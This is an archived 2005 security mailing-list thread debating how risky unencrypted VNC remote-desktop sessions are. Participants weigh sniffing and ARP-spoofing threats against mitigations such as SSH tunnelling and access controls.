RE: VNC Security

["Joshua Berry" <jberry () PENSON COM>]

Arpspoofing would be possible as long as you are on the same network.
This would allow someone to monitor your traffic whether you are on a
switch or not as long as they are in the same network on either the
client end or the server end.

My concerns would be employees and contractors that already have
*limited* access to the network would potentially get full server access
to anything running VNC.  Besides the fact that this would violate
several compliance issues within my company.

-----Original Message-----
From: Steve Bostedor [mailto:Steveb () tshore com] 
Sent: Tuesday, April 19, 2005 7:57 PM
To: Alexander.Bolante () gmail com
Cc: security-basics () securityfocus com; vnc-list () realvnc com
Subject: RE: VNC Security

Thank you for the reply, Alexander.  I understand exactly what you're
trying to say.  I'm not sure if you fully understand what I was saying
and its probably my fault for not making it clear enough.  

You seemed to concentrate on how easy it is to do things with the VNC
packets once you've sniffed the packets.  You say that you've sniffed
the packets before but have you ever sniffed packets from a network
outside of your own LAN?  How about on your LAN but on another switch
port?

What I was trying to discuss is how real the threat is that someone
outside of your network will actually get to sniff enough of and the
correct sequence of your packets to do the things that you where able to
do by sniffing the packets on your local segment.

You're basically breaking into your own house by using your own keys in
the scenario that you provided.  How realistic is it for someone in
India to sniff my packets going from a server in Detroit, MI to a server
in Jackson, MI?  How realistic is it for him to actually get usable
data?

It's Easy to say that if there's a way into your network, you're
insecure but there's a way into your house .. is your house insecure?
Is VNC really the low hanging fruit in my scenario.

I know that you all are very specific and technical, so I'll spell out
an exact scenario which happens to be the most common usage of VNC in
companies.
--------
* John Doe is getting an error message on his computer and calls the
help desk a city away for help.

* Helpdesk tells John to double-click on the VNC icon on his desktop
that starts the server

* Helpdesk connects to Johns computer and takes about 10 minutes to
resolve the problem

* Helpdesk person kills the VNC server on the remote computer and the
connection is terminated

------- 

I understand that Security is very important but it's also very
important to not go Barney Fife and start drawing the gun on everything
that moves if you get what I mean.  What are the odds that some guy in
Florida is going to sniff that 10 minute session and get into the
network?  My answer is 1 in at least 10 million.  

The guy in Florida would have to have already compromised a computer on
either of the networks that happened to be plugged into a HUB (Not a
switch) that either of the computers are plugged into ~OR~ he would have
had to hack one of the routers close to either one of them to send
packets to him as a man in the middle attack of sorts.

Both of these are a bit extreme for VNC data theft, don't you think?  If
you do all of that, isn't there a bunch of much bigger prizes at your
fingertips than VNC data?!  

Now are you starting to see what I'm saying?  The successful exploits
that must be done to get someone's VNC packet stream would land you
access to things far greater than just the VNC data and who would waste
the time with VNC data at that point?  Go for the gold, you're already
in someplace pretty good at that point.

The only EASY way that I know of to sniff someone's packets are to
either be on a hub with the remote computers or to have a Trojan on one
of the computers.  Does someone know of an easy way other than that?
Easier than just hacking into the company other ways that do not involve
VNC?

- Steve
-----Original Message-----
From: Alexander Bolante [mailto:alexander.bolante () gmail com]
Sent: Tuesday, April 19, 2005 6:25 PM
To: Steve Bostedor
Cc: security-basics () securityfocus com; vnc-list () realvnc com
Subject: Re: VNC Security


IMHO

NOTE:
For obvious reasons that VNC provides remote access to your machine,
Security is key (period). I'm assuming this thread does NOT pertain to
your COMPANY LAN, because if it does, the answer to your question,
"Why should I secure VNC over SSH?" is clearly...SOX compliance...

OTHERWISE:
Bottom line is -- if you DO NOT have any sensitive data to secure,
it's your prerogative to determine what lengths you want to take to
protect that data. Why do I tunnel VNC over SSH? To deal with the
uncertainty of potential security flaws and risks...

(SB wrote) What are the real risks of not securing VNC traffic? It
depends...
The only caveat I see in not securing VNC traffic is...network
eavesdropping

We already know that all VNC traffic between client and server is
unencrypted after authentication. That's a problem if you're moving
sensitive data. I've used a sniffer on a VNC session before. The
traffic was compressed, so it was still difficult to understand and
breakdown the data from the sniffer, BUT data passed in clear text
e.g. usernames, birthdate, home address, etc. could be useful
***depending on the malicious user's intentions***.

And because we often do NOT know what a malicious user's intentions
are, we mitigate that uncertainty by adding another layer of
security/defense in depth...tunneling VNC over SSH in order to secure
communication and not leave ports open for scanning; using TCP
wrappers to provide access control on a per-IP address basis, etc.


On 4/19/05, Steve Bostedor <Steveb () tshore com> wrote:
> I'd like to know if anyone has any working examples of why an
> unencrypted VNC session over the Internet is seen as such a horrible
> security risk.  I understand that unencrypted ANYTHING over the
Internet
> lends the chance for someone to decode the packets (assuming that they
> capture every one of them) but in reality, what are the real risks
here
> and has anyone successfully captured a VNC session from more than 2
> router hops away and actually gotten any meaningful information from
it?
> I've captured a big chunk of a LOCAL session using Ethereal and the
only
> thing that I can see that is usable is the password exchange.  Agreed
> that this could be a problem if someone just happened to be sniffing
> your local LAN segment at that exact moment and happened to capture
your
> encrypted VNC password, he could crack the password and log in
himself.
> But how paranoid is it to go through all of the trouble of setting up
> SSH to avoid that when you could just change your VNC password often
and
> make sure that your local LAN is reasonably secure from prying eyes?
>
> How about once it gets out on the Internet?  Packets bounce all over
the
> place on the Internet.  What are the odds that someone out there will
> pick your VNC packets out of all of the millions of packets running
> through the back bone routers without being noticed, capture enough of
> them to possibly replay a session, and actually have the patience or
the
> tools to do so.  I've scoured the web out of this curiosity, looking
for
> a tool to put VNC packets together into something useful for a hacker.
> There's nothing.  Nada.
>
> So, I guess that what I'm asking is; what all of the fuss is about?
> Your POP3 password likely gets passed unencrypted but we're being
asked
> to be paranoid about an encrypted VNC password?  This is all coming
from
> a discussion that I had with someone over the merits of using SSH with
> VNC over the internet for a 10 minute VNC session.
>
> Does anyone have anything that's not hypothetical?  Is there a tool
that
> I'm missing out there that does more than just crack a VNC password?
> Does anyone know of any reported security breaches where VNC was a
> weakness?


-- 
"I know nothing" -- Alexander.Bolante () gmail com